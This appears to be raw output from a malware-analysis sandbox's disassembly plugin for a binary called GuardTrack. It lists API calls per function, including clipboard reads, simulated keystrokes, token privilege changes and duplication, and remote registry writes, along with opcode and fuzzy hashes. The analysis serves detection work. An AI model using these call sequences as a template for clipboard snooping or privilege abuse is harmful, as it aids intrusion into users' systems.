                                                            • Part of subcall function 005C1821: _memmove.LIBCMT ref: 005C185B
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: FolderPath_memmove
                                                          • String ID:
                                                          • API String ID: 3334745507-0
                                                          • Opcode ID: e70561f4b470b21643fe62edb112ba48c42a0389f1d0808b65ae74421c38e24f
                                                          • Instruction ID: 9eaf70a2b0ba95019e5bf0317b7fc54e7a69f3cdeb9ba72c40d2c0373e35323d
                                                          • Opcode Fuzzy Hash: e70561f4b470b21643fe62edb112ba48c42a0389f1d0808b65ae74421c38e24f
                                                          • Instruction Fuzzy Hash: 4FD05EA590032C6FEB60E6A49C0DDBB7BACE745220F0006A57D5CC3102E9349D4586E0
                                                          APIs
                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_000677A8,00000000,00000000,?), ref: 006177DD
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: CreateThread
                                                          • String ID:
                                                          • API String ID: 2422867632-0
                                                          • Opcode ID: fa473bd5753252dfc2c6fc5fafbebec892f42dbd71b6e259de884553ad46e8ef
                                                          • Instruction ID: 19213ab88cfc4603ecede91b1ca16e1c54cd3bc6ee60eef09d6a7a1ae5b977e9
                                                          • Opcode Fuzzy Hash: fa473bd5753252dfc2c6fc5fafbebec892f42dbd71b6e259de884553ad46e8ef
                                                          • Instruction Fuzzy Hash: 80D012714683187F67288B65DC46CE776ADE905221744176EBC0582640E6A1BC4086A0
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: __wfsopen
                                                          • String ID:
                                                          • API String ID: 197181222-0
                                                          • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                          • Instruction ID: a6ead0a06572a3d196e6935ed0669d63bd9b199368db86fe5bd97a45a83fc884
                                                          • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                          • Instruction Fuzzy Hash: 50B09B7544010C77CE111945EC03A553F195740665F404011FB0C1C161B57395605585
                                                          APIs
                                                          • _doexit.LIBCMT ref: 005D3592
                                                            • Part of subcall function 005D3459: __lock.LIBCMT ref: 005D3467
                                                            • Part of subcall function 005D3459: DecodePointer.KERNEL32(0066CB70,0000001C,005D33B2,005D1003,00000001,00000000,?,005D3300,000000FF,?,005D9E5E,00000011,005D1003,?,005D9CAC,0000000D), ref: 005D34A6
                                                            • Part of subcall function 005D3459: DecodePointer.KERNEL32(?,005D3300,000000FF,?,005D9E5E,00000011,005D1003,?,005D9CAC,0000000D), ref: 005D34B7
                                                            • Part of subcall function 005D3459: EncodePointer.KERNEL32(00000000,?,005D3300,000000FF,?,005D9E5E,00000011,005D1003,?,005D9CAC,0000000D), ref: 005D34D0
                                                            • Part of subcall function 005D3459: DecodePointer.KERNEL32(-00000004,?,005D3300,000000FF,?,005D9E5E,00000011,005D1003,?,005D9CAC,0000000D), ref: 005D34E0
                                                            • Part of subcall function 005D3459: EncodePointer.KERNEL32(00000000,?,005D3300,000000FF,?,005D9E5E,00000011,005D1003,?,005D9CAC,0000000D), ref: 005D34E6
                                                            • Part of subcall function 005D3459: DecodePointer.KERNEL32(?,005D3300,000000FF,?,005D9E5E,00000011,005D1003,?,005D9CAC,0000000D), ref: 005D34FC
                                                            • Part of subcall function 005D3459: DecodePointer.KERNEL32(?,005D3300,000000FF,?,005D9E5E,00000011,005D1003,?,005D9CAC,0000000D), ref: 005D3507
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Pointer$Decode$Encode$__lock_doexit
                                                          • String ID:
                                                          • API String ID: 2158581194-0
                                                          • Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                          • Instruction ID: 272e6235fa84662b5c98ec9f5e8b88a821ee36a31b3777d12610fc37cd8ab594
                                                          • Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                          • Instruction Fuzzy Hash: 94B0123198030C33DF212545EC07F153F1C5780B50F100022FA0C1C2E1A5D3766040CA
                                                          APIs
                                                            • Part of subcall function 005B29E2: GetWindowLongW.USER32(?,000000EB), ref: 005B29F3
                                                          • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0063D208
                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0063D249
                                                          • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0063D28E
                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0063D2B8
                                                          • SendMessageW.USER32 ref: 0063D2E1
                                                          • _wcsncpy.LIBCMT ref: 0063D359
                                                          • GetKeyState.USER32(00000011), ref: 0063D37A
                                                          • GetKeyState.USER32(00000009), ref: 0063D387
                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0063D39D
                                                          • GetKeyState.USER32(00000010), ref: 0063D3A7
                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0063D3D0
                                                          • SendMessageW.USER32 ref: 0063D3F7
                                                          • SendMessageW.USER32(?,00001030,?,0063B9BA), ref: 0063D4FD
                                                          • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0063D513
                                                          • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0063D526
                                                          • SetCapture.USER32(?), ref: 0063D52F
                                                          • ClientToScreen.USER32(?,?), ref: 0063D594
                                                          • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0063D5A1
                                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0063D5BB
                                                          • ReleaseCapture.USER32 ref: 0063D5C6
                                                          • GetCursorPos.USER32(?), ref: 0063D600
                                                          • ScreenToClient.USER32(?,?), ref: 0063D60D
                                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 0063D669
                                                          • SendMessageW.USER32 ref: 0063D697
                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0063D6D4
                                                          • SendMessageW.USER32 ref: 0063D703
                                                          • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0063D724
                                                          • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0063D733
                                                          • GetCursorPos.USER32(?), ref: 0063D753
                                                          • ScreenToClient.USER32(?,?), ref: 0063D760
                                                          • GetParent.USER32(?), ref: 0063D780
                                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 0063D7E9
                                                          • SendMessageW.USER32 ref: 0063D81A
                                                          • ClientToScreen.USER32(?,?), ref: 0063D878
                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0063D8A8
                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0063D8D2
                                                          • SendMessageW.USER32 ref: 0063D8F5
                                                          • ClientToScreen.USER32(?,?), ref: 0063D947
                                                          • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0063D97B
                                                            • Part of subcall function 005B29AB: GetWindowLongW.USER32(?,000000EB), ref: 005B29BC
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0063DA17
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                          • String ID: @GUI_DRAGID$F
                                                          • API String ID: 3977979337-4164748364
                                                          • Opcode ID: ccf74a1ad9732b1b4c2c2df51844419997d7a3d1532830552bfb9b57811df37a
                                                          • Instruction ID: 8193336f0845e32f9ff37aa835e9ac64c0bd55a086e2afea66c8bb51c9e18c16
                                                          • Opcode Fuzzy Hash: ccf74a1ad9732b1b4c2c2df51844419997d7a3d1532830552bfb9b57811df37a
                                                          • Instruction Fuzzy Hash: 8542AE74204341AFD724DF28D848FAABBE6FF8A310F140619F699873A1C771E955CB92
                                                          APIs
                                                          • GetForegroundWindow.USER32(00000000,?), ref: 005C5EE2
                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 006010D7
                                                          • IsIconic.USER32(?), ref: 006010E0
                                                          • ShowWindow.USER32(?,00000009), ref: 006010ED
                                                          • SetForegroundWindow.USER32(?), ref: 006010F7
                                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0060110D
                                                          • GetCurrentThreadId.KERNEL32 ref: 00601114
                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00601120
                                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 00601131
                                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 00601139
                                                          • AttachThreadInput.USER32(00000000,?,00000001), ref: 00601141
                                                          • SetForegroundWindow.USER32(?), ref: 00601144
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00601159
                                                          • keybd_event.USER32(00000012,00000000), ref: 00601164
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0060116E
                                                          • keybd_event.USER32(00000012,00000000), ref: 00601173
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0060117C
                                                          • keybd_event.USER32(00000012,00000000), ref: 00601181
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0060118B
                                                          • keybd_event.USER32(00000012,00000000), ref: 00601190
                                                          • SetForegroundWindow.USER32(?), ref: 00601193
                                                          • AttachThreadInput.USER32(?,?,00000000), ref: 006011BA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                          • String ID: Shell_TrayWnd
                                                          • API String ID: 4125248594-2988720461
                                                          • Opcode ID: 8a64ca36e4f38157b5efde9e60346c3d7997b2b2dedcfa0de1bebe83c92b924a
                                                          • Instruction ID: 85ff64b84ede1113926cdbbd53ee498c185212ba195b13f52fd69d2dcc496c33
                                                          • Opcode Fuzzy Hash: 8a64ca36e4f38157b5efde9e60346c3d7997b2b2dedcfa0de1bebe83c92b924a
                                                          • Instruction Fuzzy Hash: 1A31A775A803287FFB241BA19C49F7F3E6EEB45B50F104055FB05AA1D0CA705D51AEA0
                                                          APIs
                                                            • Part of subcall function 00609399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 006093E3
                                                            • Part of subcall function 00609399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00609410
                                                            • Part of subcall function 00609399: GetLastError.KERNEL32 ref: 0060941D
                                                          • _memset.LIBCMT ref: 00608F71
                                                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00608FC3
                                                          • CloseHandle.KERNEL32(?), ref: 00608FD4
                                                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00608FEB
                                                          • GetProcessWindowStation.USER32 ref: 00609004
                                                          • SetProcessWindowStation.USER32(00000000), ref: 0060900E
                                                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00609028
                                                            • Part of subcall function 00608DE9: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00608F27), ref: 00608DFE
                                                            • Part of subcall function 00608DE9: CloseHandle.KERNEL32(?,?,00608F27), ref: 00608E10
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                          • String ID: $default$winsta0
                                                          • API String ID: 2063423040-1027155976
                                                          • Opcode ID: e2dd2abec9000305ecb65448176fb424230031d8552921307dbe08ab4cff4702
                                                          • Instruction ID: 6e0b71098bc3fb1d8083c3eea1a6cbe6a37c8f2cb31588d66c077e21482a8fc9
                                                          • Opcode Fuzzy Hash: e2dd2abec9000305ecb65448176fb424230031d8552921307dbe08ab4cff4702
                                                          • Instruction Fuzzy Hash: EB81687594021ABFEF159FA4DC49AEF7B7BEF05304F044159F911A22A2DB318E159B20
                                                          APIs
                                                          • OpenClipboard.USER32(00640980), ref: 0062465C
                                                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 0062466A
                                                          • GetClipboardData.USER32(0000000D), ref: 00624672
                                                          • CloseClipboard.USER32 ref: 0062467E
                                                          • GlobalLock.KERNEL32(00000000), ref: 0062469A
                                                          • CloseClipboard.USER32 ref: 006246A4
                                                          • GlobalUnlock.KERNEL32(00000000,00000000), ref: 006246B9
                                                          • IsClipboardFormatAvailable.USER32(00000001), ref: 006246C6
                                                          • GetClipboardData.USER32(00000001), ref: 006246CE
                                                          • GlobalLock.KERNEL32(00000000), ref: 006246DB
                                                          • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 0062470F
                                                          • CloseClipboard.USER32 ref: 0062481F
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                          • String ID:
                                                          • API String ID: 3222323430-0
                                                          • Opcode ID: 186f9e7d88c21aa855fc3d10e494dbc5ab013c0845d841bca591f6569bb12cc5
                                                          • Instruction ID: 8d8821ef218f9f12971a4e5e8918573466010f1a3a7f3e157e80f1ef9fde6586
                                                          • Opcode Fuzzy Hash: 186f9e7d88c21aa855fc3d10e494dbc5ab013c0845d841bca591f6569bb12cc5
                                                          • Instruction Fuzzy Hash: 2951A235244622AFE700EF60EC49F6E77AAAF85B00F00052DF656D62D2DF70D9058F66
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0061F5F9
                                                          • _wcscmp.LIBCMT ref: 0061F60E
                                                          • _wcscmp.LIBCMT ref: 0061F625
                                                          • GetFileAttributesW.KERNEL32(?), ref: 0061F637
                                                          • SetFileAttributesW.KERNEL32(?,?), ref: 0061F651
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0061F669
                                                          • FindClose.KERNEL32(00000000), ref: 0061F674
                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 0061F690
                                                          • _wcscmp.LIBCMT ref: 0061F6B7
                                                          • _wcscmp.LIBCMT ref: 0061F6CE
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0061F6E0
                                                          • SetCurrentDirectoryW.KERNEL32(0066B578), ref: 0061F6FE
                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 0061F708
                                                          • FindClose.KERNEL32(00000000), ref: 0061F715
                                                          • FindClose.KERNEL32(00000000), ref: 0061F727
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                          • String ID: *.*$Sa
                                                          • API String ID: 1803514871-3198783846
                                                          • Opcode ID: 2d80bb0b985e1ce4a81d58a6da127afc7c8bfdb31c59dc6092be5517d757f4c7
                                                          • Instruction ID: 5f59bd18dba2444802d97747ffad6dd311ec8a31f07eec65ba9ad35347063568
                                                          • Opcode Fuzzy Hash: 2d80bb0b985e1ce4a81d58a6da127afc7c8bfdb31c59dc6092be5517d757f4c7
                                                          • Instruction Fuzzy Hash: 8931E875640219ABEB10DFB4EC5DADE77AEAF0A321F144166F904D32E0DB70DA84CA60
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0061CDD0
                                                          • FindClose.KERNEL32(00000000), ref: 0061CE24
                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0061CE49
                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0061CE60
                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0061CE87
                                                          • __swprintf.LIBCMT ref: 0061CED3
                                                          • __swprintf.LIBCMT ref: 0061CF16
                                                            • Part of subcall function 005C1A36: _memmove.LIBCMT ref: 005C1A77
                                                          • __swprintf.LIBCMT ref: 0061CF6A
                                                            • Part of subcall function 005D38C8: __woutput_l.LIBCMT ref: 005D3921
                                                          • __swprintf.LIBCMT ref: 0061CFB8
                                                            • Part of subcall function 005D38C8: __flsbuf.LIBCMT ref: 005D3943
                                                            • Part of subcall function 005D38C8: __flsbuf.LIBCMT ref: 005D395B
                                                          • __swprintf.LIBCMT ref: 0061D007
                                                          • __swprintf.LIBCMT ref: 0061D056
                                                          • __swprintf.LIBCMT ref: 0061D0A5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                          • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                          • API String ID: 3953360268-2428617273
                                                          • Opcode ID: 46b6d35891520abcd5e74d23f291128a03ae87ced279488ba7731d7166b347b4
                                                          • Instruction ID: e7ff7e1260ccff0be8005ede6e1b049982e17c72eb51f920b60dddc7bd03c63b
                                                          • Opcode Fuzzy Hash: 46b6d35891520abcd5e74d23f291128a03ae87ced279488ba7731d7166b347b4
                                                          • Instruction Fuzzy Hash: 3DA11FB1404205AFD710EFA4C989DAFBBEDFF95704F400919F585C6192EB70EA45CB62
                                                          APIs
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00630FB3
                                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,00640980,00000000,?,00000000,?,?), ref: 00631021
                                                          • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00631069
                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 006310F2
                                                          • RegCloseKey.ADVAPI32(?), ref: 00631412
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0063141F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Close$ConnectCreateRegistryValue
                                                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                          • API String ID: 536824911-966354055
                                                          • Opcode ID: 902d44162ebaaa1a1b5e7143ba185cf72848b488283834825318ca9e15528dec
                                                          • Instruction ID: cd941f8b05999b83b9ded7e74628704415f2df18b411394e21f6e5ba29bce117
                                                          • Opcode Fuzzy Hash: 902d44162ebaaa1a1b5e7143ba185cf72848b488283834825318ca9e15528dec
                                                          • Instruction Fuzzy Hash: AE025B752006129FC724EF24C845E6ABBE6FF89714F04895DF99A9B362CB30ED41CB91
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0061F756
                                                          • _wcscmp.LIBCMT ref: 0061F76B
                                                          • _wcscmp.LIBCMT ref: 0061F782
                                                            • Part of subcall function 00614875: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00614890
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0061F7B1
                                                          • FindClose.KERNEL32(00000000), ref: 0061F7BC
                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 0061F7D8
                                                          • _wcscmp.LIBCMT ref: 0061F7FF
                                                          • _wcscmp.LIBCMT ref: 0061F816
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0061F828
                                                          • SetCurrentDirectoryW.KERNEL32(0066B578), ref: 0061F846
                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 0061F850
                                                          • FindClose.KERNEL32(00000000), ref: 0061F85D
                                                          • FindClose.KERNEL32(00000000), ref: 0061F86F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                          • String ID: *.*$ja
                                                          • API String ID: 1824444939-311970705
                                                          • Opcode ID: 9080c246cf6b4c2a95f12131e69a6e93a960f8f6d002c5d6ecdaabed0cb19b17
                                                          • Instruction ID: 365ac81ec9f43add29d084f062b288d3bfecb77c7233f99b40a78b88a442179d
                                                          • Opcode Fuzzy Hash: 9080c246cf6b4c2a95f12131e69a6e93a960f8f6d002c5d6ecdaabed0cb19b17
                                                          • Instruction Fuzzy Hash: D431C97550061ABAEB20DF74DC48ADE77BEDF46321F184175F905D22E0D770DA85CA60
                                                          APIs
                                                            • Part of subcall function 00608E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00608E3C
